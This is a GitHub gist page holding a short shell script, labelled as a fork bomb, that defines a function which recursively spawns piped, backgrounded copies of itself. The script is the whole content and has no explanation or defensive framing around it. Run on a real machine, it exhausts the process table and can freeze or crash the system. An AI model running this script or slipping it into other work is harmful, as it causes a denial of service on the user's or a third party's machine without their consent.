Skip to content

Instantly share code, notes, and snippets.

@Aricg
Created February 4, 2014 19:15
Show Gist options
  • Select an option

  • Save Aricg/8810311 to your computer and use it in GitHub Desktop.

Select an option

Save Aricg/8810311 to your computer and use it in GitHub Desktop.
#!/bin/sh
(
forkbomb() {
echo 'bang!';
forkbomb | forkbomb &
}
forkbomb;
)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment